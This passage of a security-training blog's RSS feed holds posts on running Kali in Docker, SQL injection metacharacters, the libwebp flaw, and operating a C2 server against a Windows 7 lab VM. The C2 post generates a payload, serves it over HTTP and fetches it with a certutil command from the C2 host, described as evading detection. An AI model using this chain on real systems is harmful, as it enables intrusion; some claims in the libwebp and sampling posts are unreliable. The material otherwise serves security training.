Docker containers replace virtual machines by virtualizing the operating system instead of the hardware. This means that Docker containers are more lightweight and efficient than virtual machines, and they can be used to run multiple applications on a single host machine.
 
Traditional virtual machines create a complete operating system environment for each virtual machine, including its own kernel, libraries, and applications. This means that each virtual machine requires its own share of the host machine's resources, such as CPU, memory, and disk space.
 
Docker containers, on the other hand, share the host machine's kernel and libraries. This means that Docker containers are much smaller and more efficient than virtual machines. Docker containers can also be started up and stopped much faster than virtual machines.

Docker containers are tied to the underlying operating system, so you cannot run Windows containers on Linux systems or vice versa.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_2319cd15768347e8a4c7b5f152812b5b~mv2.png/v1/fit/w_829,h_299,al_c,q_80/file.png"></figure>
 
 
<h2>How to Install docker on Linux</h2>
 
To install Docker on Debian-based Linux systems, run the following command:
 
sudo apt install docker.io -y
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9a03e318e0664a5e91ccf5f0db71cf8e~mv2.png/v1/fit/w_945,h_296,al_c,q_80/file.png"></figure>
 
 
If Docker is not enabled or not active after installation, run the following commands:

sudo systemctl enable docker
 
sudo systemctl start docker
 
 
<h2>Installing images</h2>
<h2></h2>
After installing Docker, you can start installing images by pulling and running them as containers. To try out the pre-built penetration testing Kali OS images from Offensive Security, download them from the official site kali.org. Once you have chosen a containerized application, you will be redirected to Docker Hub, where you can also search for other images.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_80791fce3b4c48bdb147471a52e584f8~mv2.png/v1/fit/w_972,h_683,al_c,q_80/file.png"></figure>


<figure><img src="https://static.wixstatic.com/media/6a4a49_7825dfe5bb05406988ea7adbe322aea4~mv2.png/v1/fit/w_1000,h_669,al_c,q_80/file.png"></figure>


To pull an image from Docker Hub, you can use the docker pull command with the image name.

sudo docker pull kalilinux/kali-rolling
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_665a80c8ef2b4eb3860426dd5adbac56~mv2.png/v1/fit/w_836,h_187,al_c,q_80/file.png"></figure>
 
 
To list all pulled images, run the following command:

sudo docker images
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_bb7f1b18e5e2469597f8daf468e53052~mv2.png/v1/fit/w_836,h_154,al_c,q_80/file.png"></figure>
 
 
It's time to deploy our container using the command:
 
sudo docker run -d -t --name kali kalilinux/kali-rolling
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9499d3dce0c74fb28e2bc4db44ea30ba~mv2.png/v1/fit/w_836,h_83,al_c,q_80/file.png"></figure>
 

Where:

-d Run the container in detached mode. This means that the container will run in the background, even if you exit the terminal window.
 
-t Attach an interactive terminal to the container. This is useful for running commands inside the container.
 
--name Set a custom name for the container.
 
kalilinux/kali-rolling The name of the Docker image to run as a container.
 
To list all the running containers, run the following command:

sudo docker ps
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_7773b941894640d7b56cb17596352912~mv2.png/v1/fit/w_1000,h_111,al_c,q_80/file.png"></figure>
 
 
To log in to our container, we can use the “docker exec”command:
 
sudo docker exec -it kali bash
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_99c61abf9b9449fab9851420cef48228~mv2.png/v1/fit/w_429,h_349,al_c,q_80/file.png"></figure>
 


After logging in, you may realize that there are no hacking tools installed in the Kali container. This is because the container is very lightweight and doesn't come with any preinstalled tools. However, you can easily install any required tools or toolboxes using the apt package manager.
 
<h2>Summary</h2>
 
Docker is becoming very popular among the hacker and cybersecurity industry due to the fact that it enables lightweight virtualization and comes with all the code, libraries and dependencies you need to run the application. This is one more tool in your toolbox that will help you along your path to becoming a Cyberwarrior!]]></content:encoded></item><item><title><![CDATA[Database Hacking: Common SQL Injection Commands]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! According to the Open Web Application Security Project (OWASP), command injection is perennially...]]></description><link>https://www.hackers-arise.com/post/database-hacking-common-sql-injection-commands</link><guid isPermaLink="false">652b2b030753fbdb8dfdf97e</guid><pubDate>Wed, 18 Oct 2023 19:54:02 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_d8a3986c58e94ca9804035ba29fda4a4~mv2.png/v1/fit/w_1000,h_720,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
Welcome back, my aspiring cyberwarriors!
 
According to the Open Web Application Security Project (OWASP), command injection is perennially one of the most serious and numerous attacks against web applications. In addition, these attacks usually involve serious financial damage to the companies and other institutions as they are attacks against the database, the repository of so much valuable information such as credit card numbers and personally identifiable information (PII).
 
OWASP Top 10
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d8a3986c58e94ca9804035ba29fda4a4~mv2.png/v1/fit/w_1000,h_720,al_c,q_80/file.png"></figure>
 
 
 
Although there are numerous attack vectors against databases, the most common is the SQL injection. SQL injection sends SQL commands from the web form to the backend database. 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_cfd10ff6b0d441d0a64ce14d359574c2~mv2.jpg/v1/fit/w_638,h_479,al_c,q_80/file.png"></figure>
 
 
If these SQL commands are not sanitized at the client level (browser) they can move to the database and wreak havoc, including;
 
<ol>
<li>Exfiltrate data</li>
<li>Delete data</li>
<li>Add data</li>
<li>Update data</li>
</ol>
 
When testing for SQL injection vulnerabilities, these are some of the most common commands and special characters. The better you understand SQL, the more successful you will be with SQL injection.
 
Quotes
 
Single quote ('): Frequently used to terminate string literals.
 
Double quote ("): Can also be used to terminate string literals in some databases.
 
 
Comment sequences:
 
Double dash (--): This is an SQL comment and can be used to nullify the rest of a query.
 
Hash (#): In MySQL, it's an alternate way to comment out the rest of the query.
Slash-asterisk (/* ... */): Multiline comment. 
 
Can be used to comment out parts or all of a query.
 
Operators and commands:
 
Semicolon (;): Represents the end of one query and the start of another.
 
Logical operators: AND, OR.
 
Control functions: UNION, UNION ALL.
 
Boolean values
 
TRUE or 1=1: Always evaluates to true and can be used to manipulate WHERE clauses.
 
FALSE or 1=0: Always evaluates to false
 
Time-delay functions
 
 SLEEP(x): In MySQL, causes a delay for x seconds.
 
 
WAITFOR DELAY 'hh:mm:ss': In SQL Server, causes a delay.
 
pg_sleep(x): In PostgreSQL, causes a delay for x seconds.
 
 
Information retrieval
 
 @@version: Retrieves the database version (works in many databases).
 
CURRENT_USER: Retrieves the current user.
 
Hex encoding
 
Attackers might encode their payloads in hexadecimal to bypass naive filters.
 
Wildcards
 
Percent sign (%): Represents zero or more characters in SQL LIKE clauses. This was used the recent MoveIT attack by C|op.
 
Special functions
 
CONCAT(): Used to concatenate strings in SQL.
 
CAST(), CONVERT(): Used for type conversion.
 
ASCII(), CHAR(): Functions to get ASCII values or characters, can be used in blind SQLi.
 
Subselects and metadata queries
 
SELECT ... FROM information_schema.tables: Used in databases like MySQL and PostgreSQL to gather metadata about tables.
 
SELECT ... FROM sysobjects ...: Used in SQL Server to gather metadata.
 
<h2>Summary</h2>
 
Injection attacks against web forms leading to exfiltration of database data are among the most serious attacks compromising web security. These attacks against the database are using in the form SQLi attacks where SQL commands are sent to the backend database from unsanitized input from the client (browser). Although SQLi attacks are becoming increasingly difficult, a thorough and deep understanding of SQL is necessary to be successful in our more security conscious era.
<h2></h2>]]></content:encoded></item><item><title><![CDATA[Android Hacking: The libwebp Vulnerability (zero-day/zero-click)]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! In recent days, a new and severe vulnerability has been found among the Android ecosystem that...]]></description><link>https://www.hackers-arise.com/post/android-hacking-the-libwebp-vulnerability-zero-day-rce-with-no-user-interaction</link><guid isPermaLink="false">65217582fb6700bac603d4d9</guid><pubDate>Wed, 11 Oct 2023 15:53:39 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_b00ebb52273c42108635b5b116369862~mv2.png/v1/fit/w_800,h_534,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Welcome back, my aspiring cyberwarriors!
 
In recent days, a new and severe vulnerability has been found among the Android ecosystem that puts all Android devices, and even Apple iOS devices, at risk. It enables the attacker to send images via SMS and take control of the device with no user interaction! This vulnerability was first identified by Citizen Lab, a research lab based at the University of Toronto and famous for its tracking of the Pegasus malware. The vulnerability was first reported as CVE-2023-41064 but we have since learned that this vulnerability is ubiquitous throughout the Android ecosystem, Google chrome and many other Linux/Unix based systems. In addition, Telegram, the ToR browser, Brave, Gimp, LibreOffice and many other applications are vulnerable. This may be one of the most important vulnerabilities of our era!
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_b00ebb52273c42108635b5b116369862~mv2.png/v1/fit/w_800,h_534,al_c,q_80/file.png"></figure>
 
 
 
The vulnerability involves a library (reusable code) developed by Google over a decade ago to process images known as libwebp. libwebp was designed to be a more efficient method of processing images than say jpeg or other image processes algorithms. As such, it is used throughout the mobile device world and many browsers.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d43519ff90b54e18bfcef19a35994d39~mv2.png/v1/fit/w_773,h_297,al_c,q_80/file.png"></figure>
 
 
The danger of this vulnerability is that it enables the attacker to install remote code on the device and take control with NO interaction from the user. 
 
Let's delve a bit deeper into libwebp and this vulnerability.
 
<h2>What is libwebp?</h2>
 
libwebp is a library used by developers to compress graphic files for easier and more efficient transfer over the Internet. Nearly all graphic files you are familiar with such a jpeg, tiff, png, etc. are all compressed file formats. Without these compression algorithms, the Internet would move much slower. We also use compression in audio and video files such as mp3 and mp4.
 
libwebp was developed by Google and is widely used among phones, mobile devices and browsers. It's compression is significantly superior to other widely used compression algorithms such as jpeg (as much as 30-40% for efficient).
<h2></h2>
<h2>What is Lossless and Lossy Compression</h2>
<h2></h2>
Lossless compression is data compression in which the original data can be perfectly reconstructed from the compressed data. In other words, when a file undergoes lossless compression and is subsequently decompressed, no information is lost and the output is identical to the original input. PNG, FLAC, GIF and ZIP are lossless compression algorithms. Lossless compression is used throughout the Internet where speed and efficiency are important but where integrity is also necessary.
 
Lossy graphic file compression is a method of data compression where some of the file's data is permanently discarded during the compression process. In the context of graphic files, this means that some image information is lost when the file is compressed and cannot be fully recovered upon decompression. The main objective is to significantly reduce the file size to save storage space and decrease load times, often at the cost of some degradation in image quality. Many graphic, audio and video files are compressed with lossy compression due to the fact that our eyes and ears are not so sensitive to pick up the change of a single pixel or note
 
<h2>How Does the Exploit Work</h2>
 
This exploit creates a buffer overflow in the image decoder enabling the attacker to install their own remote code and control the device. libwebp uses a Huffman tables (developed by David A. Huffman in 1952, is a popular method for lossless data compression. The central principle of Huffman coding is to use shorter binary codes for more frequent elements in the data and longer codes for less frequent elements) for compression and decompression. The compressed image files contain information about the shape of the Huffman tables and those tables are constructed by the decoder. These Huffman tables are constructed in a heap (heap is a memory area what application data is stored). A specially crafted WebP file can create a Huffman tree that overflows the heap and allows the attackers code to run
<h2></h2>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_07a1054452164910ada6af409fba1b7e~mv2.png/v1/fit/w_1000,h_772,al_c,q_80/file.png"></figure>
 
 
<h2>Summary</h2>
<h2></h2>
The libwebp vulnerability affects nearly every mobile device whether Android or iOS. It also affects the most commonly used browsers and many applications that enable graphics manipulations. The libwebp vulnerability may be the most important mobile device vulnerability of our times!
 
To learn more about this ubiquitous and sever vulnerability, attend our upcoming Android Hacking training.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
 
 
]]></content:encoded></item><item><title><![CDATA[50% off Subscriber and Subscriber Pro for those in non-industrialized Nations!]]></title><description><![CDATA[We recognize that incomes vary dramatically from one nation to the next and we don't want to exclude anyone from the best cybersecurity...]]></description><link>https://www.hackers-arise.com/post/50-off-subscriber-and-subscriber-pro-for-those-in-non-industrialized-nations</link><guid isPermaLink="false">6524b3837f96c5ba4496c2be</guid><pubDate>Tue, 10 Oct 2023 02:31:42 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_239684333f5440b5bd7ed693dc3fdb99~mv2.png/v1/fit/w_420,h_217,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[We recognize that incomes vary dramatically from one nation to the next and we don't want to exclude anyone from the best cybersecurity training anywhere!
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_239684333f5440b5bd7ed693dc3fdb99~mv2.png/v1/fit/w_420,h_217,al_c,q_80/file.png"></figure>
 
 
If you live in a non-industrialized nation, you can become a Subscriber or Subscriber Pro at 50% off!
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_96901eedcdce43b4abefcd113c8f91c5~mv2.png/v1/fit/w_660,h_363,al_c,q_80/file.png"></figure>
If you live in a country other than those listed above, you are eligible.
 
Don't miss this opportunity. We have made 20 coupons available and when they are gone, they are gone.
 
 
To get you coupon, email <a href="hackers-arise@protonmail.com" target="_blank">hackers-arise@protonmail.com</a> and identify what nation you are from. If you qualify, we will send you a coupon for 50% off!]]></content:encoded></item><item><title><![CDATA[Command & Control Series Part II (Operating your own C2 Server)]]></title><description><![CDATA[Introduction. We already know what a C2, or Command and Control server is and, if you are not familiar you should take a look at our...]]></description><link>https://www.hackers-arise.com/post/command-control-series-part-ii-operating-your-own-c2-server</link><guid isPermaLink="false">64f147068332984579204ea9</guid><pubDate>Fri, 06 Oct 2023 14:09:18 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
<figure><img src="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png"></figure>
 
 
Introduction.
 
We already know what a C2, or Command and Control server is and, if you are not familiar you should take a look at our first post of this series. In the <a href="https://www.hackers-arise.com/post/command-control-series-part-i-installing-your-own-c2-server-on-kali-linux" target="_blank">first post of this series</a>, we walked through setting up and configuring one. Now, it's time to test its functionality and get acquainted with its operational behavior. It's important to note that, at this point, we are not yet obfuscating our communications; that is, we are not using any redirectors between the 'Client and the Server.' As such, what you'll see is a direct connection between the victim and our C2 server. It's crucial to emphasize this because, in a real-world operation, the approach would be different.
 
 At this stage, our C2 server is up and running. If you're familiar with our previous post, you'll recall that the last screenshot we shared is depicted in the image below.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5d7c96a7444445dd9569a04420501d7a~mv2.png/v1/fit/w_1000,h_436,al_c,q_80/file.png"></figure>
 
At this point, we are going to build our first Listener.
 
What is a Listener?
 
In the context of a Command and Control (C2) server, a listener is essentially a server-side component designed to wait for incoming connections from compromised clients, often referred to as "agents" or "bots." A listener operates on a specific port and may use a particular protocol (HTTP, HTTPS, DNS, TCP, etc.) to establish and maintain communication with the client-side malware that's executed on the target systems.
 
Then go to the tab called 'View' and select 'Listeners.' On your PC, you should see something that looks like this:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9f29b80e48a34458830827e4aefccec5~mv2.png/v1/fit/w_253,h_265,al_c,q_80/file.png"></figure>
 
 
 After you select 'Listeners,' a window will appear on your screen while this C2 offers a plethora of customization options, for the sake of keeping this demonstration straightforward, we'll stick to the default settings, as illustrated in the screenshot below:
 
Go ahead and click save.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_dfed1b377bdc4e43a78c2aebc6ed1890~mv2.png/v1/fit/w_470,h_732,al_c,q_80/file.png"></figure>
 
After following the previous steps, you can confirm that the Listener is set up and actively waiting for incoming connections. This will be evident as a new tab will open at the bottom of the C2 interface. Additionally, you'll see a notification in the top-right corner, confirming that the Listener has been initiated. The notification will display the name you've assigned to it, in this case, 'Demon.' The two images below illustrate what you should see on your screen.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_53a5004859e14577b331944b885a7cb2~mv2.png/v1/fit/w_1000,h_104,al_c,q_80/file.png"></figure>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_a6c7ede7609044d8a35f47134454d7da~mv2.png/v1/fit/w_333,h_101,al_c,q_80/file.png"></figure>
 
It's time to generate our first payload.
 
What is a payload?
 
In the context of a Command and Control (C2) server, a "payload" refers to the malicious code or data that is sent from the C2 server to a compromised system (the "client") or from the client back to the C2 server. Payloads can serve multiple purposes depending on what the attacker aims to achieve, such as executing specific commands, exfiltrating data, or providing additional functionality to the malware already on the compromised system. When it comes to the operational phase of a C2 framework, generating the payload is a crucial step. This is the component that you will need to deliver to the target system through some means, such as email phishing, drive-by downloads, or other attack vectors.
 
Once the payload is executed on the target system, it establishes a connection back to the C2 server, effectively allowing the attacker to control the compromised system. You can customize payloads to perform a range of tasks including, but not limited to, keylogging, capturing webcam and microphone data, stealing credentials, or conducting lateral movement within a network. Some advanced C2 frameworks allow for "modular" payloads, which can download additional functional modules from the C2 server as required, making them highly flexible and extensible.
 
Go ahead and click on the 'Attack' tab, then select the 'Payload' option.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_1c27762cc68545ccb2d8f0fc0754b041~mv2.png/v1/fit/w_273,h_152,al_c,q_80/file.png"></figure>
 
A window similar to the one shown in the image below will appear on your screen. As you can see, it offers a multitude of customization options for our payload. However, for the sake of keeping this post straightforward, we'll stick with the default settings this time. In future posts, we'll delve into how to tailor your payload using advanced techniques, which we also cover in-depth in our 'Infrastructure for Hackers' course. So, without further ado, click 'Generate,' using the example in the following image as your guide.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_155259ab079b48b3b60de07cde5173b0~mv2.png/v1/fit/w_469,h_579,al_c,q_80/file.png"></figure>
 
 
 If all goes well, you should see a series of instructions appear at the bottom of the window as the payload is being generated. See the picture below:
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_46bb3eeb54504c9cb173a564d7c39812~mv2.png/v1/fit/w_471,h_583,al_c,q_80/file.png"></figure>
 
 
 Once the payload is generated, you can navigate through the directory to locate where it has been saved. In my case, as you can see, it's located on the desktop.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_47df910827b044c48ee1a9d09c0dfd43~mv2.png/v1/fit/w_613,h_431,al_c,q_80/file.png"></figure>
 
Using the command python -m http.server spins up a simple HTTP server using Python's built-in HTTP server module. When you run this command, the current directory where the command is executed becomes the base directory for the server, allowing files to be served to clients requesting them over HTTP. The server listens on port 8000 by default, but you can specify a different port by appending it to the command, e.g., python -m http.server 8080. This is often used in C2 setups, penetration testing, and red teaming exercises for quick and easy file transfers, though it's important to note that it doesn't offer any encryption or authentication mechanisms out-of-the-box.
 
Here's a quick rundown of what happens under the hood:
<ol>
<li>Initialization: The Python HTTP server module (http.server) is initialized. This is a simple, built-in HTTP server that comes packaged with Python's standard library.</li>
<li>Socket Creation and Binding: A socket is created and bound to the host (usually localhost or 0.0.0.0 to listen on all available network interfaces) and port specified (default is 8000).</li>
<li>Listening: The server starts listening for incoming HTTP requests. When a request is received, it reads the HTTP headers to determine what file or path the client is requesting.</li>
<li>File Serving: It looks for the requested file in its base directory (the directory from which you ran the command). If it finds the file, it serves it back to the client. If not, it sends a 404 error.</li>
<li>Logging: Most interactions are logged to the console, providing information on the client IP, requested path, and other details.</li>
</ol>
 In a cyber operations context, while simple and quick, this approach should be used cautiously. Lack of encryption and authentication could pose a security risk, making the server and the files it serves vulnerable to unauthorized access or man-in-the-middle attacks. For more secure implementations, one could consider using more robust solutions like an Nginx or Apache server, potentially with SSL encryption.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f26fc51f3a5846bdb3063d4da70c0afd~mv2.png/v1/fit/w_688,h_211,al_c,q_80/file.png"></figure>
 
 
 Now, we'll employ a Windows 7 virtual machine as our target operating system, on which we'll open our Command Prompt (cmd) terminal.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9fed0bb645c34aaa93003ec572fd869b~mv2.png/v1/fit/w_657,h_528,al_c,q_80/file.png"></figure>
 
 
In this part of the guide, we'll focus on an interesting Windows utility, certutil, to fetch our payload from the Command and Control (C2) server. In the context of a Red Team operation, downloading your payload securely and stealthily is crucial. While there are various ways to do it, certutil can come in handy as it's a legitimate built-in Windows utility mainly used for certificate management, but it can also be 'abused' for our purpose.
Here's the command broken down:
<ul>
<li>certutil: This is the Windows utility we're using.</li>
<li>-urlcache: This flag is for telling certutil to cache the object retrieved from the URL.</li>
<li>-split: This flag specifies that the object should be split across several records in the cache. This is not particularly needed in our context but can be useful for large files.</li>
<li>-f: This flag stands for 'force', ensuring that the download happens even if the file already exists.</li>
<li>http://192.168.1.88:8000/demon.exe: This is the URL of your C2 server where demon.exe, your payload, resides.</li>
</ul>
The full command, certutil -urlcache -split -f http://192.168.1.88:8000/demon.exe, will therefore download demon.exe from your C2 server and store it locally on the machine you're operating on. One of the beauties of using certutil in this manner is that it often bypasses traditional detection methods due to its legitimate status. However, newer security solutions are getting better at detecting this kind of 'living-off-the-land' technique, so your mileage may vary.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_4b0f694b3bb14675bce4b8fe35d4f029~mv2.png/v1/fit/w_549,h_275,al_c,q_80/file.png"></figure>
 
 As you can observe in the screenshot below, the payload has been successfully transferred to the desktop of the target machine.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_ebd5cc0d03894fef84f42d80ad6d919c~mv2.png/v1/fit/w_354,h_269,al_c,q_80/file.png"></figure>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_27d94c3ffccc47f1a92cd981b92b65df~mv2.png/v1/fit/w_801,h_236,al_c,q_80/file.png"></figure>
 
Now, go ahead and double-click on the payload on the target machine.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_39ac72f52bdb4b2aa0b5b255171f8c0e~mv2.png/v1/fit/w_1000,h_869,al_c,q_80/file.png"></figure>
 
 Instantly, you will observe that the right-hand pane of our C2 interface initiates the connection, allowing us full control over our target.
<figure><img src="https://static.wixstatic.com/media/6a4a49_80fe4103d38d49aeb244d9b2deb676a1~mv2.png/v1/fit/w_1000,h_155,al_c,q_80/file.png"></figure>
 
 Now navigate to the 'View' tab and select the 'Graphical View' option. You'll be able to visualize the interaction between the C2 and the target machine, as illustrated in the image below.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_797f152783d14679a50edd042e9b3e4d~mv2.png/v1/fit/w_745,h_290,al_c,q_80/file.png"></figure>
 
 If you right-click on the target machine within the graphical view, you'll gain not only interactive access but also the ability to view process listings and file explorer details, as showcased in the images below.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_e3f6f502a5e3469aae4e219be3ba1086~mv2.png/v1/fit/w_736,h_416,al_c,q_80/file.png"></figure>
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_b87ebf77e4ce4768b41f090d8b1fbea2~mv2.png/v1/fit/w_801,h_448,al_c,q_80/file.png"></figure>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_6b908c17dfb244669eb177c58e042b51~mv2.png/v1/fit/w_683,h_609,al_c,q_80/file.png"></figure>
 
 
 If you right-click on the target machine's graphical representation and choose the 'Interact' option, you'll have the capability to execute various actions on the target system. To do this, navigate to the bottom of the newly-opened tab triggered by the aforementioned process and type 'help,' followed by pressing Enter.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_c771fb573dbd43f59e041e9f2a4f52cf~mv2.png/v1/fit/w_885,h_808,al_c,q_80/file.png"></figure>
 
 Below, you'll find a screenshot that illustrates what you should be seeing on your computer at this point. This provides an overview of some of the actions you can execute on the target machine.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_03f777c4d26a405aacb03c13bb1fdac0~mv2.png/v1/fit/w_702,h_791,al_c,q_80/file.png"></figure>
 
 Go ahead and enter the 'checkin' command. This will provide you with comprehensive information about the target system, as illustrated in the photos below.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_4553943d16e74443b1bb2998644db100~mv2.png/v1/fit/w_348,h_27,al_c,q_80/file.png"></figure>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_b7d95efce8194fe18634700309dc2291~mv2.png/v1/fit/w_565,h_517,al_c,q_80/file.png"></figure>
 
 This has been merely a small glimpse into the capabilities you can unlock with just a few commands. Imagine the endless possibilities when you master comprehensive infrastructure deployment systems along with intricate scenarios. To delve deeper into this subject, I've listed two potential options below that you might want to explore.
 
Smouk out!
 
If you liked what you saw, you might be interested in our <a href="https://hackersarise.thinkific.com/courses/infrastructure-basics-for-hackers" target="_blank">Hacking Infrastructure course</a>, or perhaps you'd like to consider becoming part of our community by becoming a <a href="https://www.hackers-arise.com/online-store/Subscriber-3-years-of-training-p134507114" target="_blank">Subscriber PRO.</a>
 
 
 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
 
 
]]></content:encoded></item><item><title><![CDATA[Radio Basics for Hackers, Part 3: Sampling ]]></title><description><![CDATA[Welcome back my aspiring cyber warriors! Sampling is the process of converting a continuous signal into a discrete signal. In the context...]]></description><link>https://www.hackers-arise.com/post/radio-basics-for-hackers-part-3-sampling</link><guid isPermaLink="false">6494bdeaf82e7a34f83fefcb</guid><pubDate>Thu, 05 Oct 2023 15:50:50 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_1fdcac2630dd491f9fabcedeec7b3dbc~mv2.jpg/v1/fit/w_600,h_480,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
Welcome back my aspiring cyber warriors!
 
Sampling is the process of converting a continuous signal into a discrete signal. In the context of radio signals, sampling is the process of converting an analog radio signal into a digital signal. Remember, the original signal is all analog but our computer systems are all digital. Sampling enables the process of re-creating a digital signal that resembles the original analog signal.

The Nyquist–Shannon sampling theorem states that in order to perfectly reconstruct an analog signal from its samples, the sampling frequency must be greater than twice the highest frequency component of the analog signal. This makes sense as we must capture enough samples to reconstruct the signal and twice the frequencies means 2 samples per wave. Anything less risks producing a digital signal that does not represent the original signal.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_1fdcac2630dd491f9fabcedeec7b3dbc~mv2.jpg/v1/fit/w_600,h_480,al_c,q_80/file.png"></figure>
 

For example, if an analog radio signal has a bandwidth of 100 kHz, then the sampling frequency must be greater than 200 kHz. This means that the analog signal must be sampled at least 200,000 times per second.

The sampling process is performed by an analog-to-digital converter (ADC). The ADC converts the analog signal into a digital signal by measuring the amplitude of the signal at regular intervals. The amplitude measurements are then stored as a sequence of numbers.

The digital signal can then be processed by a digital signal processor (DSP). The DSP can perform a variety of operations on the digital signal, such as filtering, modulation, and demodulation.

The digital signal can then be transmitted over a digital medium, such as a computer network or a cellular network.

Sampling is a critical part of radio communications. It allows analog signals to be converted into digital signals, which can then be processed and transmitted over digital media.

Here are some of the benefits of sampling:

<ul>
<li>Increased accuracy: Sampling allows for more accurate representation of the analog signal.</li>
<li>Reduced noise: Sampling can reduce noise by averaging the signal over multiple samples.</li>
<li>Increased bandwidth: Sampling can increase the bandwidth of the signal, which allows more information to be transmitted.</li>
</ul>
 
Sampling is a powerful technique that can be used to improve the performance of radio communications. It is a valuable tool for anyone who wants to transmit analog signals over digital media.]]></content:encoded></item></channel></rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):

<a href="http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml"><img src="valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a>

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml

Home · About · News · Docs · Terms